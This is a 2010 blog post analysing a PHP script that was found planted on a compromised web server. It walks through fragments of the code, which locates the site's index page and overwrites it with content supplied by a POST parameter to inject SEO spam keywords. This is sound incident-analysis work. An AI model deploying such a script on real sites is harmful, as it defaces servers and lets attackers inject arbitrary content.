Skip to content

PHP SEO-ware?

July 31, 2010

Recently a contact sent me a PHP script he found on his webserver, most likely placed there via a file-upload/command execution vulnerability in an older version of the CMS. I don’t have all of the details, but here is a quick analysis of the script. Definitely not the typical backdoor one would expect to see from an exploited file-upload vulnerability. If anyone has seen anything like this before, I’d like to know.

$t = "../";
$r = ".html";
if(!file_exists($t."index".$r)) $r = ".htm";
if(!file_exists($t."index".$r)) $r = ".shtml";
if(!file_exists($t."index".$r)) $r = ".phtml";
if(!file_exists($t."index".$r)) $r = ".php";

This looks to be a generic snippet for determining the regular index page in the directory (or in this case up one directory). It tries various extensions using the built-in PHP file_exists() method.

  $read = html_entity_decode(implode('',file($t."index".$r)));
    $fp = fopen($t."index".$r,"w");
    if(fwrite($fp,$read."\n<!--gen-->")) print "Setuped...";
  } else print "Already....";

This section is where it starts getting interesting. If the add query string parameter is specified on the request, the code will read the contents of the index page (as determined above). file() returns an array of lines, and the call to implode() joins the array with an empty string. html_entity_decode() decodes HTML entities like &lt; and &gt; into their regular character equivalents. If the index file does not contain <!--gen-->, it is appended to the end of the file.

  $f = file_get_contents($_POST['f']);
  $read = html_entity_decode(implode('',file($t."index".$r)));
    $ex = explode("<!--gen-->",$read);
    $fw = $ex[0].$op."<!--gen-->".$f;
    $fp = fopen($t."index".$r,"w");
    if(fwrite($fp,$fw)) print "<h1>{OK!}</h1>";

If the PHP page was requested via POST, the code does something different. Again, it reads the contents of the index page, but this time it will also rewrite the contents of the index file with the contents read from the file specified in the f POST parameter. The GET section described above is the first-time prep/initialization of the index file for this section below.

The webserver had files stored in a different directory that had copies of the main index page escaped with htmlentities() as well as extra lines like the following:

&lt;b&gt;printable map hawaii&lt;/b&gt;&lt;br /&gt;
Free printable scary black cat and witch's pot Halloween name tags Print Jun 8, 2010 printable halloween tags. All about Free Printable Kids Preschool . &lt;br /&gt;&lt;br /&gt;

So someone gained remote access to a webserver, and chose to modify the pages served to include “SEO” type keywords that don’t actually point to anything in particular. I’m intrigued.


From → Uncategorized

Leave a Comment

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: